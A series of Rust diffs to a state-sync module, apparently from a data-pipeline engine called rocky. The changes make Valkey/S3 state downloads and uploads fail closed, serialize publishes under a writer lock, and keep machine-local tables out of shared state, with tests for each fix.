+                // mark its local ledger non-authoritative instead of silently
+                // starting fresh over a populated remote.
                 Err(e) => {
-                    warn!(error = %e, outcome = "error_then_fresh", "state existence check failed (non-fatal, starting fresh)");
-                    Ok(())
+                    warn!(error = %e, outcome = "error", "state existence check failed; propagating (fail-closed)");
+                    Err(e)
                 }
             }
         })
@@ -671,7 +770,14 @@ where
 async fn download_from_valkey(
     config: &StateConfig,
     local_path: &Path,
-) -> Result<(), StateSyncError> {
+) -> Result<DownloadOutcome, StateSyncError> {
+    // Test seam: force a Valkey MISS without a live Valkey peer, so the tiered
+    // fall-through-to-S3 path (and the "stale local file is not a hit" fix) can
+    // be exercised deterministically. See [`test_support::arm_valkey_miss_fault`].
+    #[cfg(test)]
+    if test_support::take_valkey_miss_fault() {
+        return Ok(DownloadOutcome::Absent);
+    }
     let url = config
         .valkey_url
         .as_ref()
@@ -695,36 +801,38 @@ async fn download_from_valkey(
         with_transfer_timeout(timeout, async move {
             let key_for_task = key.clone();
             let local_for_task = local_path_owned.clone();
-            let join = tokio::task::spawn_blocking(move || -> Result<(), StateSyncError> {
-                let client =
-                    redis::Client::open(url).map_err(|e| StateSyncError::Valkey(e.to_string()))?;
-                let mut conn = client
-                    .get_connection()
-                    .map_err(|e| StateSyncError::Valkey(e.to_string()))?;
+            let join =
+                tokio::task::spawn_blocking(move || -> Result<DownloadOutcome, StateSyncError> {
+                    let client = redis::Client::open(url)
+                        .map_err(|e| StateSyncError::Valkey(e.to_string()))?;
+                    let mut conn = client
+                        .get_connection()
+                        .map_err(|e| StateSyncError::Valkey(e.to_string()))?;
 
-                let data: Option<Vec<u8>> = redis::cmd("GET")
-                    .arg(&key_for_task)
-                    .query(&mut conn)
-                    .map_err(|e| StateSyncError::Valkey(e.to_string()))?;
+                    let data: Option<Vec<u8>> = redis::cmd("GET")
+                        .arg(&key_for_task)
+                        .query(&mut conn)
+                        .map_err(|e| StateSyncError::Valkey(e.to_string()))?;
 
-                match data {
-                    Some(bytes) => {
-                        std::fs::write(&local_for_task, bytes)?;
-                        let size = std::fs::metadata(&local_for_task)
-                            .map(|m| m.len())
-                            .unwrap_or(0);
-                        info!(size, outcome = "ok", "state restored from Valkey");
+                    match data {
+                        Some(bytes) => {
+                            std::fs::write(&local_for_task, bytes)?;
+                            let size = std::fs::metadata(&local_for_task)
+                                .map(|m| m.len())
+                                .unwrap_or(0);
+                            info!(size, outcome = "ok", "state restored from Valkey");
+                            Ok(DownloadOutcome::Restored)
+                        }
+                        None => {
+                            info!(
+                                outcome = "absent",
+                                "No existing state in Valkey — starting fresh"
+                            );
+                            Ok(DownloadOutcome::Absent)
+                        }
                     }
-                    None => {
-                        info!(
-                            outcome = "absent",
-                            "No existing state in Valkey — starting fresh"
-                        );
-                    }
-                }
-                Ok(())
-            })
-            .await;
+                })
+                .await;
             match join {
                 Ok(inner) => inner,
                 Err(e) => Err(StateSyncError::Valkey(format!(
@@ -1656,6 +1764,158 @@ mod tests {
         assert!(
             matches!(&err, StateSyncError::MissingConfig(backend, _) if backend == "s3"),
             "expected the S3 dispatch to be reached (MissingConfig for the bucket); got {err:?}"
+        );
+    }
+
+    // -----------------------------------------------------------------------
+    // S2 — a failed download must NOT be treated as authoritative-empty
+    // -----------------------------------------------------------------------
+
+    /// S2 (a): an injected existence-check failure makes `download_state` return
+    /// `Err`, not `Ok`. Pre-fix the `Err(e)` arm logged and returned `Ok(())`
+    /// ("non-fatal, starting fresh"), hiding a real download failure from the
+    /// caller's fail-closed machinery. The in-memory provider never errors on
+    /// `exists`, so we drive the arm through the `probe_exists` test seam — this
+    /// is the only in-crate way to make the assertion RED before the fix.
+    #[tokio::test]
+    async fn download_existence_failure_propagates_not_fresh_start() {
+        test_support::clear();
+        let dir = TempDir::new().unwrap();
+        let local = dir.path().join(".rocky-state.redb");
+
+        // Route object-store construction to an in-memory provider (so no live
+        // S3 client is built), then arm the existence-probe fault.
+        let _provider = test_support::install(ObjectStoreProvider::in_memory());
+        test_support::arm_object_store_exists_fault();
+
+        let config = StateConfig {
+            backend: StateBackend::S3,
+            s3_bucket: Some("bucket".into()),
+            ..Default::default()
+        };
+        let result = download_state(&config, &local).await;
+        test_support::clear();
+
+        assert!(
+            matches!(result, Err(StateSyncError::S3Download(_))),
+            "a failed existence check must propagate as Err (fail-closed), not a silent \
+             fresh-start Ok; got {result:?}"
+        );
+        assert!(
+            !local.exists(),
+            "no local state file should be written when the download failed"
+        );
+    }
+
+    /// S2 (a'): the absent case stays non-fatal. An in-memory provider with no
+    /// object at the key returns `Ok(())` — a legit fresh start must not be
+    /// turned into an error by the fail-closed change above.
+    #[tokio::test]
+    async fn download_absent_object_is_non_fatal_fresh_start() {
+        test_support::clear();
+        let dir = TempDir::new().unwrap();
+        let local = dir.path().join(".rocky-state.redb");
+        let _provider = test_support::install(ObjectStoreProvider::in_memory());
+
+        let config = StateConfig {
+            backend: StateBackend::S3,
+            s3_bucket: Some("bucket".into()),
+            ..Default::default()
+        };
+        let result = download_state(&config, &local).await;
+        test_support::clear();
+
+        assert!(
+            result.is_ok(),
+            "an absent remote object must be a fresh start (Ok); got {result:?}"
+        );
+        assert!(
+            !local.exists(),
+            "nothing to restore, so no local file is written"
+        );
+    }
+
+    /// S2 (b): a Valkey MISS with a *stale* local file present must fall through
+    /// to the durable S3 tier, not short-circuit. Pre-fix the tiered dispatch
+    /// matched `Ok(()) if local_path.exists()` and counted the stale file as a
+    /// Valkey hit, starving the S3 fallback. Post-fix hit/miss is an explicit
+    /// `DownloadOutcome`, so the S3 tier restores authoritative state over the
+    /// stale bytes.
+    #[tokio::test]
+    async fn tiered_valkey_miss_with_stale_local_falls_through_to_s3() {
+        test_support::clear();
+        let dir = TempDir::new().unwrap();
+        // Legacy global file → remote key `state.redb`.
+        let local = dir.path().join(".rocky-state.redb");
+        // A STALE local file left by a previous run — the exact bait the old
+        // `local_path.exists()` heuristic mistook for a Valkey hit.
+        std::fs::write(&local, b"STALE").unwrap();
+
+        // The durable S3 tier (in-memory) holds authoritative state at the
+        // schema-qualified key.
+        let provider = test_support::install(ObjectStoreProvider::in_memory());
+        let key = object_store_state_key(&remote_state_key(&local));
+        provider
+            .put(&key, Bytes::from_static(b"FRESH-FROM-S3"))
+            .await
+            .unwrap();
+
+        // Force the Valkey leg to MISS (no live peer needed).
+        test_support::arm_valkey_miss_fault();
+
+        let config = StateConfig {
+            backend: StateBackend::Tiered,
+            s3_bucket: Some("bucket".into()),
+            // valkey_url intentionally None: the miss fault short-circuits
+            // before URL resolution, proving the fall-through independently.
+            ..Default::default()
+        };
+        let outcome = download_state_inner(&config, &local).await.unwrap();
+        test_support::clear();
+
+        assert_eq!(
+            outcome,
+            DownloadOutcome::Restored,
+            "the S3 tier must have restored state after the Valkey miss"
+        );
+        assert_eq!(
+            std::fs::read(&local).unwrap(),
+            b"FRESH-FROM-S3",
+            "the stale local file must be replaced by the S3 tier's content — proving the \
+             tiered dispatch fell through instead of treating the stale file as a Valkey hit"
+        );
+    }
+
+    /// S2 (b'): with both tiers absent (Valkey miss + empty S3), the tiered
+    /// download resolves to `Absent` — a real fresh start — and writes no local
+    /// file. Complements (b): the fall-through does not manufacture a spurious
+    /// `Restored` when there is genuinely nothing to restore.
+    #[tokio::test]
+    async fn tiered_both_tiers_absent_stays_absent() {
+        test_support::clear();
+        let dir = TempDir::new().unwrap();
+        let local = dir.path().join(".rocky-state.redb");
+
+        // In-memory S3 tier installed but EMPTY (no object at the key).
+        let _provider = test_support::install(ObjectStoreProvider::in_memory());
+        test_support::arm_valkey_miss_fault();
+
+        let config = StateConfig {
+            backend: StateBackend::Tiered,
+            s3_bucket: Some("bucket".into()),
+            ..Default::default()
+        };
+        let outcome = download_state_inner(&config, &local).await.unwrap();
+        test_support::clear();
+
+        assert_eq!(
+            outcome,
+            DownloadOutcome::Absent,
+            "both tiers absent ⇒ Absent (a real fresh start)"
+        );
+        assert!(
+            !local.exists(),
+            "nothing to restore, so no local file is written"
         );
     }
 }

--- a/engine/crates/rocky-core/src/state_sync.rs
+++ b/engine/crates/rocky-core/src/state_sync.rs
@@ -274,85 +274,131 @@ enum DownloadOutcome {
 ///
 /// ## Crash safety + fail-closed (finding 5)
 ///
-/// The remote content is downloaded into a STAGING file beside `local_path` and
-/// the local-only tables are merged into that staging file; only then is the
+/// The remote content is downloaded into a STAGING file beside `local_path`; the
+/// local-only tables are merged into that staging file, and only then is the
 /// COMPLETE merged db published to `local_path` with a single atomic `rename`.
 /// So `local_path` is never left holding remote content *without* its local-only
 /// tables — a crash before the rename leaves the prior local file fully intact.
-/// A snapshot / merge / publish failure is **fail-closed** (propagated as `Err`
-/// after a bounded retry on transient redb open contention), distinct from a
-/// genuinely-absent local file (which is not an error — there is simply nothing
-/// to preserve).
+/// A merge / publish failure is **fail-closed** (propagated as `Err` after a
+/// bounded retry on transient redb open contention).
+///
+/// ## Publish serialization (finding B)
+///
+/// The download itself runs **without** any lock (it is network I/O). The
+/// snapshot-of-local-only + merge + atomic publish then run **while holding the
+/// same advisory writer lock [`StateStore::open`] takes**
+/// ([`crate::state::try_acquire_writer_lock`]), and the lock is released before
+/// this returns so the caller's `StateStore::open` can re-acquire it. This
+/// serializes the publish with any concurrent StateStore writer and with another
+/// download's publish on the same namespace, so a late `rename` can never clobber
+/// a live writer's file. Crucially, the local-only tables are re-read from the
+/// CURRENT local file *under the lock*, so a concurrent run's just-committed
+/// `jobs` are captured rather than lost.
 pub async fn download_state(config: &StateConfig, local_path: &Path) -> Result<(), StateSyncError> {
     let remote_key = remote_state_key(local_path);
 
-    // Local backend never replaces the file — skip the whole preserve dance.
+    // Local backend never replaces the file — nothing to stage, merge, or lock.
     if matches!(config.backend, StateBackend::Local) {
         download_state_inner(config, local_path, &remote_key).await?;
         return Ok(());
     }
 
+    // 1. Download the remote into a STAGING file (no lock). `local_path` is left
+    //    untouched; `Absent` leaves the staging file unwritten.
     let scratch_dir = sibling_scratch_dir(local_path);
-
-    // Snapshot the local-only tables (jobs, schema_cache) BEFORE any download —
-    // the remote copy has them stripped, so this is their only source of truth.
-    // A genuinely-absent local file has nothing to preserve (`None`, not an
-    // error); a *present* but unreadable/contended file is FAIL-CLOSED after a
-    // bounded retry (finding 5b) — never silently discarded.
-    let preserved: Option<PathBuf> = if local_path.exists() {
-        Some(snapshot_local_only_tables(local_path, &scratch_dir).await?)
-    } else {
-        None
-    };
-
-    // Download the remote into a STAGING file, never `local_path` — so the local
-    // file is replaced exactly once, by a single atomic rename of a fully-merged
-    // db (finding 5a: no crash window where local-only tables are missing).
     let staged = unique_scratch_path(&scratch_dir, "download");
     let outcome = match download_state_inner(config, &staged, &remote_key).await {
         Ok(outcome) => outcome,
         Err(e) => {
             let _ = std::fs::remove_file(&staged);
-            if let Some(p) = &preserved {
-                let _ = std::fs::remove_file(p);
-            }
             return Err(e);
         }
     };
 
-    let result = match outcome {
-        DownloadOutcome::Restored => {
-            // `staged` holds the remote replicated tables. Always overwrite its
-            // local-only tables: from the prior local file when we have it, else
-            // EMPTY — a pre-this-patch remote snapshot (taken when only
-            // `schema_cache` was local-only) can still carry another pod's `jobs`
-            // rows, which must NOT land locally (finding 6a). Then publish
-            // atomically.
-            apply_local_only_and_publish(&staged, preserved.as_deref(), local_path).await
-        }
-        DownloadOutcome::Absent => {
-            // No remote object for this key. The replicated tables must reset to
-            // fresh/empty (finding 6) while the local-only tables are preserved.
-            // The pre-download snapshot already holds ONLY the local-only tables,
-            // so publishing it makes the replicated tables fresh and keeps
-            // `jobs` / `schema_cache`. With no prior local file it is a genuine
-            // fresh start — leave `local_path` absent.
+    // 2. Acquire the StateStore writer lock so the snapshot + merge + publish
+    //    serialize with concurrent writers/publishes (finding B). Released on
+    //    drop, before this function returns.
+    let lock = match acquire_publish_lock(local_path).await {
+        Ok(lock) => lock,
+        Err(e) => {
             let _ = std::fs::remove_file(&staged);
-            match preserved.as_deref() {
-                Some(snapshot) => publish_atomically(snapshot, local_path),
-                None => Ok(()),
-            }
+            return Err(e);
         }
     };
 
-    // Best-effort cleanup — a successful publish already consumed (renamed) its
-    // source file, so these are no-ops on the happy path and only mop up after a
-    // failure.
+    // 3. Under the lock: re-read the CURRENT local-only tables, merge them into
+    //    the candidate db, and publish atomically.
+    let result = publish_merged(&staged, local_path, outcome).await;
+
+    drop(lock);
     let _ = std::fs::remove_file(&staged);
-    if let Some(p) = &preserved {
-        let _ = std::fs::remove_file(p);
-    }
     result
+}
+
+/// Acquire the StateStore writer lock for `local_path` (the same lock
+/// `StateStore::open` takes), retrying briefly on contention before failing
+/// closed. Serializes the download's atomic publish with StateStore writers and
+/// with a concurrent download (finding B).
+async fn acquire_publish_lock(
+    local_path: &Path,
+) -> Result<crate::state::StateWriterLock, StateSyncError> {
+    const MAX_ATTEMPTS: u32 = 5;
+    let mut last: Option<crate::state::StateError> = None;
+    for attempt in 1..=MAX_ATTEMPTS {
+        match crate::state::try_acquire_writer_lock(local_path) {
+            Ok(lock) => return Ok(lock),
+            Err(e) => {
+                last = Some(e);
+                if attempt < MAX_ATTEMPTS {
+                    tokio::time::sleep(Duration::from_millis(20 * u64::from(attempt))).await;
+                }
+            }
+        }
+    }
+    Err(StateSyncError::Io(std::io::Error::other(format!(
+        "could not acquire the state writer lock to publish downloaded state \
+         (another writer holds it): {}",
+        last.expect("retry loop runs at least once")
+    ))))
+}
+
+/// Build the merged candidate db and publish it to `local_path` with a single
+/// atomic `rename` — MUST be called while holding the writer lock (finding B).
+///
+/// The local-only tables are read from the CURRENT `local_path` here (not a
+/// pre-download snapshot), so a concurrent run's just-committed rows are captured.
+/// Fail-closed on any merge/publish error (finding 5b).
+async fn publish_merged(
+    staged: &Path,
+    local_path: &Path,
+    outcome: DownloadOutcome,
+) -> Result<(), StateSyncError> {
+    let local_exists = local_path.exists();
+    let tables = crate::state::LOCAL_ONLY_TABLE_NAMES;
+    match outcome {
+        DownloadOutcome::Restored => {
+            // `staged` holds the remote replicated tables. Overwrite its
+            // local-only tables from the current local file, or EMPTY them when
+            // there is none — a pre-this-patch remote snapshot can still carry
+            // another pod's `jobs` rows, which must NOT land locally (finding 6a).
+            if local_exists {
+                redb_op_retry(|| copy_named_tables(local_path, staged, tables)).await?;
+            } else {
+                redb_op_retry(|| clear_named_tables(staged, tables)).await?;
+            }
+            publish_atomically(staged, local_path)
+        }
+        DownloadOutcome::Absent if local_exists => {
+            // No remote object: the replicated tables must reset to fresh/empty
+            // (finding 6) while the local-only tables are preserved. Build a fresh
+            // db carrying ONLY the current local-only tables (`staged` was not
+            // written by an `Absent` download, so `copy_named_tables` creates it
+            // with just those tables → replicated tables are empty on next open).
+            redb_op_retry(|| copy_named_tables(local_path, staged, tables)).await?;
+            publish_atomically(staged, local_path)
+        }
+        DownloadOutcome::Absent => Ok(()),
+    }
 }
 
 /// Directory that should host the sibling scratch file for `local_path`, so an
@@ -406,58 +452,6 @@ async fn redb_op_retry<T>(
         }
     }
     Err(last.expect("retry loop runs at least once"))
-}
-
-/// Build a fresh redb **beside** `local_path` holding ONLY the
-/// [`crate::state::LOCAL_ONLY_TABLE_NAMES`] tables copied from it, returning the
-/// snapshot path (the caller owns its lifecycle: splice-into-staged then delete,
-/// or promote-by-rename on `Absent`).
-///
-/// The snapshot lives in `scratch_dir` (a sibling of `local_path`) precisely so
-/// the `Absent`-case promotion can `rename` it into place atomically on the same
-/// filesystem. Fail-closed with a bounded retry (finding 5b).
-async fn snapshot_local_only_tables(
-    local_path: &Path,
-    scratch_dir: &Path,
-) -> Result<PathBuf, StateSyncError> {
-    let snapshot = unique_scratch_path(scratch_dir, "localonly");
-    redb_op_retry(|| {
-        // Start each attempt from a clean file so a half-written scratch from a
-        // failed attempt cannot poison the next one.
-        let _ = std::fs::remove_file(&snapshot);
-        copy_named_tables(local_path, &snapshot, crate::state::LOCAL_ONLY_TABLE_NAMES)
-    })
-    .await
-    .inspect_err(|_| {
-        let _ = std::fs::remove_file(&snapshot);
-    })?;
-    Ok(snapshot)
-}
-
-/// Overwrite the [`crate::state::LOCAL_ONLY_TABLE_NAMES`] tables in `staged`
-/// (the freshly-downloaded remote db) — from `preserved` when a prior local file
-/// existed, else EMPTY (finding 6a) — then publish `staged` to `local_path` with
-/// a single atomic `rename`. Fail-closed (finding 5b).
-async fn apply_local_only_and_publish(
-    staged: &Path,
-    preserved: Option<&Path>,
-    local_path: &Path,
-) -> Result<(), StateSyncError> {
-    match preserved {
-        Some(snapshot) => {
-            redb_op_retry(|| {
-                copy_named_tables(snapshot, staged, crate::state::LOCAL_ONLY_TABLE_NAMES)
-            })
-            .await?;
-        }
-        None => {
-            // No prior local file: the remote's local-only rows (if any survived
-            // from a pre-patch upload) must be emptied, not trusted.
-            redb_op_retry(|| clear_named_tables(staged, crate::state::LOCAL_ONLY_TABLE_NAMES))
-                .await?;
-        }
-    }
-    publish_atomically(staged, local_path)
 }
 
 /// Publish `src` to `dst` with a single atomic `rename` (same-filesystem by
@@ -811,16 +805,22 @@ fn strip_local_only_tables(
     })?;
     for name in excluded_tables {
         let def: redb::TableDefinition<&str, &[u8]> = redb::TableDefinition::new(name);
-        if let Err(e) = txn.delete_table(def) {
-            // Bubble up only genuine delete errors; a missing-table error
-            // (TableError::TableDoesNotExist) is a legitimate no-op and
-            // is represented by `Ok(false)` from the v2 API.
-            warn!(
-                table = name,
-                error = %e,
-                outcome = "delete_table_failed",
-                "filter could not drop table (continuing with remainder)"
-            );
+        // Finding C: a genuinely-absent table is a legitimate no-op — the v2 API
+        // returns `Ok(false)` for it (an older copy that never had `schema_cache`
+        // uploads cleanly). But a REAL `delete_table` error (e.g. a table with an
+        // incompatible definition on an otherwise-valid redb) must FAIL the
+        // filter — swallowing it would commit an UNFILTERED scratch and upload
+        // this pod's local-only rows (`jobs` / `schema_cache`) to shared remote
+        // state. `TableDoesNotExist` (if a redb version surfaces it as an error
+        // rather than `Ok(false)`) stays non-fatal; every other error propagates.
+        match txn.delete_table(def) {
+            Ok(_) => {}
+            Err(redb::TableError::TableDoesNotExist(_)) => {}
+            Err(e) => {
+                return Err(StateSyncError::Io(std::io::Error::other(format!(
+                    "redb delete_table('{name}') for state filter failed: {e}"
+                ))));
+            }
         }
     }
     txn.commit().map_err(|e| {
@@ -2665,6 +2665,118 @@ mod tests {
         assert!(
             !uploaded,
             "no state object may be uploaded when the local-only filter fails (no leak)"
+        );
+    }
+
+    /// Finding B: a download must not publish over a LIVE writer. While a
+    /// `StateStore` holds the writer lock, `download_state` downloads to staging
+    /// but cannot acquire the lock to publish, so it fails closed and leaves the
+    /// live writer's file intact. Once the lock frees, a fresh download applies
+    /// the remote and preserves the local-only tables.
+    #[tokio::test]
+    async fn download_publish_fails_closed_when_writer_lock_held() {
+        test_support::clear();
+        let dir = TempDir::new().unwrap();
+        let local = dir.path().join(".rocky-state.redb");
+        seed_local_with_local_only(&local, "local.wm", "job-1");
+
+        let remote_bytes = build_remote_object_bytes(dir.path(), "remote.fresh");
+        let provider = test_support::install(ObjectStoreProvider::in_memory());
+        let key = object_store_state_key(&remote_state_key(&local));
+        provider.put(&key, Bytes::from(remote_bytes)).await.unwrap();
+
+        let config = StateConfig {
+            backend: StateBackend::S3,
+            s3_bucket: Some("bucket".into()),
+            ..Default::default()
+        };
+
+        // Hold the writer lock, as a live `rocky run` would during execution.
+        let held = StateStore::open(&local).unwrap();
+
+        let result = download_state(&config, &local).await;
+        assert!(
+            result.is_err(),
+            "the publish must fail closed while another writer holds the lock (finding B)"
+        );
+        assert!(
+            held.get_watermark("local.wm").unwrap().is_some(),
+            "a concurrent download must not clobber the live writer's state"
+        );
+
+        // Release the lock; a fresh download now applies the remote + preserves
+        // the local-only `jobs`.
+        drop(held);
+        download_state(&config, &local)
+            .await
+            .expect("download should succeed once the writer lock is free");
+        test_support::clear();
+
+        let store = StateStore::open(&local).unwrap();
+        assert!(
+            store.get_watermark("remote.fresh").unwrap().is_some(),
+            "the remote replicated watermark is applied after the lock frees"
+        );
+        assert_eq!(
+            store.list_jobs().unwrap().len(),
+            1,
+            "local-only jobs preserved"
+        );
+    }
+
+    /// Finding C: a GENUINE `delete_table` error must FAIL the filter — not be
+    /// swallowed and let an UNFILTERED scratch upload this pod's local-only rows.
+    /// A `schema_cache` created as a MULTIMAP table makes the strip's regular
+    /// `delete_table` error (`TableIsMultimap`) rather than the benign
+    /// missing-table `Ok(false)`. `strip_local_only_tables` propagates it, and the
+    /// upload therefore aborts under `Fail` with nothing written.
+    #[tokio::test]
+    async fn upload_delete_table_error_fails_closed_no_unfiltered_upload() {
+        test_support::clear();
+        let dir = TempDir::new().unwrap();
+        let local = dir.path().join(".rocky-state.redb");
+
+        // A valid redb whose `schema_cache` is a MULTIMAP table, so the strip's
+        // regular `delete_table("schema_cache")` returns a genuine error instead
+        // of `Ok(false)`.
+        {
+            let db = redb::Database::create(&local).unwrap();
+            let txn = db.begin_write().unwrap();
+            {
+                let def: redb::MultimapTableDefinition<&str, &[u8]> =
+                    redb::MultimapTableDefinition::new("schema_cache");
+                let mut t = txn.open_multimap_table(def).unwrap();
+                t.insert("k", b"v".as_slice()).unwrap();
+            }
+            txn.commit().unwrap();
+        }
+
+        // Direct: the filter propagates the delete_table error.
+        assert!(
+            strip_local_only_tables(&local, LOCAL_ONLY_TABLE_NAMES).is_err(),
+            "a genuine delete_table error must fail the filter (finding C)"
+        );
+
+        // End-to-end: the upload aborts under Fail and writes NO object.
+        let provider = test_support::install(ObjectStoreProvider::in_memory());
+        let config = StateConfig {
+            backend: StateBackend::S3,
+            s3_bucket: Some("bucket".into()),
+            on_upload_failure: StateUploadFailureMode::Fail,
+            ..Default::default()
+        };
+        let result = upload_state(&config, &local).await;
+        let key = object_store_state_key(&remote_state_key(&local));
+        let uploaded = provider.exists(&key).await.unwrap();
+        test_support::clear();
+
+        assert!(
+            result.is_err(),
+            "the upload must abort on a delete_table filter error under Fail (finding C)"
+        );
+        assert!(
+            !uploaded,
+            "no unfiltered state object may be uploaded when the filter fails (finding C)"
         );
     }
 }

--- a/engine/crates/rocky-core/src/state_sync.rs
+++ b/engine/crates/rocky-core/src/state_sync.rs
@@ -2779,4 +2779,83 @@ mod tests {
             "no unfiltered state object may be uploaded when the filter fails (finding C)"
         );
     }
+
+    /// Finding 3: the budget-burn decision PAIR (a plain rule-decision row + a
+    /// verify-after custody Deny for the same plan) must survive the remote
+    /// round-trip, so a later agent action on another pod burns the autonomy
+    /// budget. Pod A records the pair and uploads; pod B downloads a fresh copy;
+    /// `budget_failures_in_window` counts the failed plan.
+    #[tokio::test]
+    async fn budget_pair_survives_remote_round_trip_and_burns_budget() {
+        use crate::config::{PolicyCapability, PolicyEffect, PolicyPrincipal};
+        use crate::state::PolicyDecisionRecord;
+
+        test_support::clear();
+        let _provider = test_support::install(ObjectStoreProvider::in_memory());
+        let now = chrono::Utc::now();
+
+        // Pod A: a failed governed apply — the plain rule decision (winning rule
+        // 0) plus the verify-after custody Deny, both keyed to `plan-1`.
+        let dir_a = TempDir::new().unwrap();
+        let pod_a = dir_a.path().join(".rocky-state.redb");
+        {
+            let store = StateStore::open(&pod_a).unwrap();
+            store
+                .record_policy_decision(&PolicyDecisionRecord {
+                    timestamp: now,
+                    plan_id: "plan-1".into(),
+                    principal: PolicyPrincipal::Agent,
+                    capability: PolicyCapability::Apply,
+                    model: "m".into(),
+                    effect: PolicyEffect::Allow,
+                    rule_id: Some(0),
+                    reason: "plain rule decision".into(),
+                    verify_after: vec![],
+                    auto_apply: None,
+                })
+                .unwrap();
+            store
+                .record_policy_decision(&PolicyDecisionRecord {
+                    timestamp: now,
+                    plan_id: "plan-1".into(),
+                    principal: PolicyPrincipal::Agent,
+                    capability: PolicyCapability::Apply,
+                    model: "*".into(),
+                    effect: PolicyEffect::Deny,
+                    rule_id: None,
+                    reason: "verify_after FAILED".into(),
+                    verify_after: vec!["row_count".into()],
+                    auto_apply: None,
+                })
+                .unwrap();
+            drop(store);
+        }
+
+        let config = StateConfig {
+            backend: StateBackend::S3,
+            s3_bucket: Some("bucket".into()),
+            ..Default::default()
+        };
+        upload_state(&config, &pod_a).await.unwrap();
+
+        // Pod B: a fresh pod downloads the remote state.
+        let dir_b = TempDir::new().unwrap();
+        let pod_b = dir_b.path().join(".rocky-state.redb");
+        download_state(&config, &pod_b).await.unwrap();
+        test_support::clear();
+
+        let store = StateStore::open(&pod_b).unwrap();
+        let decisions = store.list_policy_decisions().unwrap();
+        let burned = crate::policy::budget_failures_in_window(
+            &decisions,
+            0,
+            chrono::Duration::hours(24),
+            now + chrono::Duration::seconds(1),
+        );
+        assert_eq!(
+            burned, 1,
+            "the rule-decision + verify-custody pair must survive the remote round-trip so the \
+             failed apply burns rule 0's budget (finding 3)"
+        );
+    }
 }

--- a/engine/crates/rocky-core/src/state_sync.rs
+++ b/engine/crates/rocky-core/src/state_sync.rs
@@ -247,8 +247,217 @@ enum DownloadOutcome {
 /// A missing remote object is **non-fatal** (`Ok(())`, a fresh start). A real
 /// download/existence-check *failure* is **propagated** as `Err` so the caller
 /// can fail closed — see [`download_from_object_store`].
+///
+/// # Local-only-preserving merge (findings 6 + 7)
+///
+/// A remote download REPLACES the replicated tables wholesale: a
+/// [`DownloadOutcome::Restored`] overwrites the file, and a
+/// [`DownloadOutcome::Absent`] would otherwise leave a *stale* local file
+/// authoritative. Neither may be allowed to disturb the machine-local tables in
+/// [`crate::state::LOCAL_ONLY_TABLE_NAMES`] (`jobs`, `schema_cache`), which are
+/// stripped from the remote copy on upload and so never travel back down:
+///
+/// - **Restored** — the local file is replaced by the remote (which carries the
+///   authoritative replicated tables but *no* local-only tables). The local-only
+///   tables are snapshotted **before** the download and spliced back in
+///   afterwards, so `jobs` / `schema_cache` survive a download that replaces the
+///   replicated tables.
+/// - **Absent** — no remote object exists for this key. For a REMOTE backend the
+///   replicated tables must become **fresh** (empty) — a switch to an empty
+///   prefix must not keep stale watermarks (finding 6) — while the local-only
+///   tables are preserved. The pre-download snapshot already holds *only* the
+///   local-only tables, so promoting it to the authoritative file both clears
+///   the replicated tables and keeps `jobs` / `schema_cache`.
+///
+/// The **Local** backend performs no transfer, so there is nothing to replace
+/// and nothing to preserve — it delegates straight to [`download_state_inner`].
 pub async fn download_state(config: &StateConfig, local_path: &Path) -> Result<(), StateSyncError> {
-    download_state_inner(config, local_path).await.map(|_| ())
+    // Local backend never replaces the file — skip the whole preserve dance.
+    if matches!(config.backend, StateBackend::Local) {
+        download_state_inner(config, local_path).await?;
+        return Ok(());
+    }
+
+    // Snapshot the local-only tables BEFORE the download overwrites the file.
+    // Best-effort: an unreadable local db (corrupt / absent) means there is
+    // nothing durable to preserve, so we proceed without the snapshot rather
+    // than blocking the run — the download's own fail-closed semantics for a
+    // *remote* error are untouched.
+    let preserved = if local_path.exists() {
+        match snapshot_local_only_tables(local_path) {
+            Ok(snapshot) => Some(snapshot),
+            Err(e) => {
+                warn!(
+                    error = %e,
+                    outcome = "preserve_snapshot_failed",
+                    "could not snapshot local-only state tables before download; \
+                     proceeding without preservation (jobs / schema_cache may reset)"
+                );
+                None
+            }
+        }
+    } else {
+        None
+    };
+
+    let outcome = match download_state_inner(config, local_path).await {
+        Ok(outcome) => outcome,
+        Err(e) => {
+            // Download failed (fail-closed). Drop the snapshot and surface the
+            // error; the local file is whatever the inner path left behind.
+            if let Some(snapshot) = preserved {
+                let _ = std::fs::remove_file(&snapshot);
+            }
+            return Err(e);
+        }
+    };
+
+    match (outcome, preserved) {
+        (DownloadOutcome::Restored, Some(snapshot)) => {
+            // `local_path` is now the remote replicated tables (local-only
+            // stripped on upload). Splice the preserved local-only tables back
+            // in — a single redb write transaction, atomic at commit. Replicated
+            // tables are left exactly as the remote wrote them.
+            if let Err(e) =
+                copy_named_tables(&snapshot, local_path, crate::state::LOCAL_ONLY_TABLE_NAMES)
+            {
+                warn!(
+                    error = %e,
+                    outcome = "preserve_splice_failed",
+                    "could not restore local-only tables after download; they reset this run"
+                );
+            }
+            let _ = std::fs::remove_file(&snapshot);
+        }
+        (DownloadOutcome::Restored, None) => {
+            // No prior local-only tables to preserve — the restored replicated
+            // state stands alone (local-only tables start empty).
+        }
+        (DownloadOutcome::Absent, Some(snapshot)) => {
+            // No remote object for this key. The pre-download snapshot holds
+            // ONLY the local-only tables, so promoting it to the authoritative
+            // file resets the replicated tables to fresh/empty (finding 6) while
+            // preserving `jobs` / `schema_cache` (finding 7). The rename is
+            // atomic because the snapshot is a sibling of `local_path`.
+            if let Err(e) = std::fs::rename(&snapshot, local_path) {
+                warn!(
+                    error = %e,
+                    outcome = "preserve_promote_failed",
+                    "could not reset replicated tables on an absent remote; \
+                     leaving prior local state in place"
+                );
+                let _ = std::fs::remove_file(&snapshot);
+            }
+        }
+        (DownloadOutcome::Absent, None) => {
+            // No prior local file and no remote object — a genuine fresh start.
+        }
+    }
+
+    Ok(())
+}
+
+/// Directory that should host the sibling scratch file for `local_path`, so an
+/// `Absent`-promotion rename stays on the same filesystem (and is therefore
+/// atomic). Falls back to the current directory when `local_path` has no parent
+/// component.
+fn sibling_scratch_dir(local_path: &Path) -> PathBuf {
+    local_path
+        .parent()
+        .filter(|p| !p.as_os_str().is_empty())
+        .map(Path::to_path_buf)
+        .unwrap_or_else(|| PathBuf::from("."))
+}
+
+/// Build a fresh redb **beside** `local_path` holding ONLY the
+/// [`crate::state::LOCAL_ONLY_TABLE_NAMES`] tables copied from it. Returns the
+/// snapshot path; the caller owns its lifecycle (splice-then-delete, or
+/// promote-by-rename).
+///
+/// The snapshot is a sibling of `local_path` (not under `std::env::temp_dir()`)
+/// precisely so the `Absent`-case promotion can `rename` it into place
+/// atomically on the same filesystem.
